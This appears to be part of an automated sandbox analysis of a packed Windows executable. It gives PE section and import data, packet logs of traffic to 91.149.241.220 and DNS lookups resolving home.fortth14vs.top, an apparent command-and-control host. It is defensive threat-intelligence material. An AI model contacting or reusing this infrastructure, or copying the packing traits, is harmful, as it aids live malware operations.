IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74c05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x74b000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x778200 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc94108 | 0x10 | ufmrywdo
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc940b8 | 0x18 | ufmrywdo
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x74a000 | 0x289000 | 10732989af025d04ee1f5c81512b8118 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x74b000 | 0x2b0 | 0x200 | 70bb495665e9c820e75ba29eea4cbb62 | False | 0.794921875 | data | 5.993344716006869 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x74c000 | 0x1000 | 0x200 | 52564c2cea63394dbc4e71775ebabcc0 | False | 0.166015625 | data | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x74d000 | 0x390000 | 0x200 | 922dc0d999f215448a2d9fa92d018046 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ufmrywdo | 0xadd000 | 0x1b8000 | 0x1b7400 | 9410e37eb95b6a0482b8b3d02c1128c5 | False | 0.9944913426650541 | data | 7.956545640250439 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gqgzmhdq | 0xc95000 | 0x1000 | 0x400 | 08dedea419a1e951a7d7a0829d753c1d | False | 0.7333984375 | data | 5.87847718293532 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc96000 | 0x3000 | 0x2200 | c89ec1e6f15eb13b17cb0878c4668358 | False | 0.060776654411764705 | DOS executable (COM) | 0.7460674703198418 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc94118 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Dec 31, 2024 09:45:38.162849903 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.162961960 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.162967920 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163033962 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.163045883 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163110018 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163280010 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163417101 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163511038 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163574934 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163578987 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163583040 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163611889 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163615942 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163671970 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163676023 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163749933 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163753986 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163804054 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163834095 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163903952 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163957119 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163960934 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164019108 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164027929 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164082050 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164089918 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164134979 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164139986 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164206028 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164210081 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164283037 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164284945 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.164287090 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164297104 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164299965 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164309025 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164313078 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164352894 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.164366961 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164371014 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164378881 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164391041 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164400101 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164406061 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164438963 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164442062 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164462090 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164465904 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164505005 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164515018 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164540052 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164544106 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164555073 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164585114 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164606094 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164735079 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164740086 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164743900 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164747000 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164751053 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164753914 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164762974 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164808035 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164812088 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164819002 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164822102 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164825916 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164829016 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164838076 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167627096 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167813063 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167849064 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167881012 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167927980 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167932034 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167967081 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.168020010 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169116974 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169153929 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169267893 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169279099 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169363022 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169372082 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169384003 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169388056 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169413090 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169416904 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169437885 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.169492960 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169497967 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169503927 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.169531107 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169534922 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169560909 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169564962 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169676065 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169680119 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169696093 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169702053 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169717073 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169761896 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169765949 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169775009 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169800997 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169805050 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169871092 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169874907 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169884920 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169889927 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169934988 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169994116 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169998884 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170042038 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170056105 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170125008 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170130014 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170188904 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170192957 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170247078 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170250893 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170295000 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170299053 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170341969 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170345068 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170413971 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170418978 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170435905 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170473099 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170485973 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170527935 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170578003 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170582056 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174289942 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174294949 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174345016 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174350023 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174396992 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174401045 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174457073 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174460888 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174503088 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174508095 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174588919 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174592018 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.174593925 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174638987 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174643040 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174652100 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.174688101 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174691916 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174766064 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174770117 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174793005 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174796104 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174855947 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174860001 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174892902 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174918890 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174962997 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174967051 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175013065 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175017118 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175075054 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175079107 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175124884 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175129890 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175173998 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175178051 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175226927 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175230980 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175276041 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175281048 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175342083 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175347090 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175359011 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175384045 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175388098 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175396919 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175440073 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175443888 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175462008 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175466061 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175519943 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175530910 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175542116 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175545931 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175596952 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179439068 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179444075 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179486036 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179490089 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179529905 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179533958 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179582119 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179637909 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.179657936 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179662943 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179718018 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179722071 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179738045 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179781914 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179816961 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179860115 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179894924 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179944038 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180006981 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180011034 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180052996 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180057049 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180110931 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180114985 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180151939 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180181980 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180238962 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180243015 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180265903 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180269957 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180320024 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180325031 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180373907 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180377960 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180409908 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180413961 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180424929 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180490017 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180494070 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180531979 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180536985 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180562973 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180567026 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180583954 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180588007 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180640936 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180645943 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180675030 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180680037 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180691957 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180695057 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180753946 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180757999 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180769920 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184411049 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184504032 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184506893 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184552908 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184557915 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184626102 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184629917 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184678078 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184683084 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184737921 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184741974 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184782982 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184825897 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184878111 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184885979 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184923887 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184928894 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184968948 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184973955 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185007095 CET804971391.149.241.220192.168.2.12
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Dec 31, 2024 09:45:34.978200912 CET | 51124 | 53 | 192.168.2.12 | 1.1.1.1
                                      Dec 31, 2024 09:45:34.978256941 CET | 51124 | 53 | 192.168.2.12 | 1.1.1.1
                                      Dec 31, 2024 09:45:34.985717058 CET | 53 | 51124 | 1.1.1.1 | 192.168.2.12
                                      Dec 31, 2024 09:45:34.985769987 CET | 53 | 51124 | 1.1.1.1 | 192.168.2.12
                                      Dec 31, 2024 09:45:36.917809010 CET | 51127 | 53 | 192.168.2.12 | 1.1.1.1
                                      Dec 31, 2024 09:45:36.917880058 CET | 51127 | 53 | 192.168.2.12 | 1.1.1.1
                                      Dec 31, 2024 09:45:37.009717941 CET | 53 | 51127 | 1.1.1.1 | 192.168.2.12
                                      Dec 31, 2024 09:45:37.611953020 CET | 53 | 51127 | 1.1.1.1 | 192.168.2.12
                                      Dec 31, 2024 09:45:43.108728886 CET | 55830 | 53 | 192.168.2.12 | 1.1.1.1
                                      Dec 31, 2024 09:45:43.108798027 CET | 55830 | 53 | 192.168.2.12 | 1.1.1.1
                                      Dec 31, 2024 09:45:43.892755985 CET | 53 | 55830 | 1.1.1.1 | 192.168.2.12
                                      Dec 31, 2024 09:45:44.055700064 CET | 53 | 55830 | 1.1.1.1 | 192.168.2.12
                                      Dec 31, 2024 09:45:44.849580050 CET | 55832 | 53 | 192.168.2.12 | 1.1.1.1
                                      Dec 31, 2024 09:45:44.849634886 CET | 55832 | 53 | 192.168.2.12 | 1.1.1.1
                                      Dec 31, 2024 09:45:44.942926884 CET | 53 | 55832 | 1.1.1.1 | 192.168.2.12
                                      Dec 31, 2024 09:45:44.942944050 CET | 53 | 55832 | 1.1.1.1 | 192.168.2.12
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Dec 31, 2024 09:45:34.978200912 CET | 192.168.2.12 | 1.1.1.1 | 0xfc7b | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                      Dec 31, 2024 09:45:34.978256941 CET | 192.168.2.12 | 1.1.1.1 | 0x6f6f | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
                                      Dec 31, 2024 09:45:36.917809010 CET | 192.168.2.12 | 1.1.1.1 | 0xfbe0 | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
                                      Dec 31, 2024 09:45:36.917880058 CET | 192.168.2.12 | 1.1.1.1 | 0x9ce0 | Standard query (0) | home.fortth14vs.top | 28 | IN (0x0001) | false
                                      Dec 31, 2024 09:45:37.021233082 CET | 192.168.2.12 | 1.1.1.1 | 0x9ce0 | Standard query (0) | home.fortth14vs.top | 28 | IN (0x0001) | false
                                      Dec 31, 2024 09:45:43.108728886 CET | 192.168.2.12 | 1.1.1.1 | 0xea20 | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
                                      Dec 31, 2024 09:45:43.108798027 CET | 192.168.2.12 | 1.1.1.1 | 0xd127 | Standard query (0) | home.fortth14vs.top | 28 | IN (0x0001) | false
                                      Dec 31, 2024 09:45:44.849580050 CET | 192.168.2.12 | 1.1.1.1 | 0xf72e | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
                                      Dec 31, 2024 09:45:44.849634886 CET | 192.168.2.12 | 1.1.1.1 | 0xc651 | Standard query (0) | home.fortth14vs.top | 28 | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Dec 31, 2024 09:45:34.985769987 CET | 1.1.1.1 | 192.168.2.12 | 0xfc7b | No error (0) | httpbin.org | | 34.197.122.172 | A (IP address) | IN (0x0001) | false
                                      Dec 31, 2024 09:45:34.985769987 CET | 1.1.1.1 | 192.168.2.12 | 0xfc7b | No error (0) | httpbin.org | | 34.200.57.114 | A (IP address) | IN (0x0001) | false
                                      Dec 31, 2024 09:45:37.611953020 CET | 1.1.1.1 | 192.168.2.12 | 0xfbe0 | No error (0) | home.fortth14vs.top | | 91.149.241.220 | A (IP address) | IN (0x0001) | false
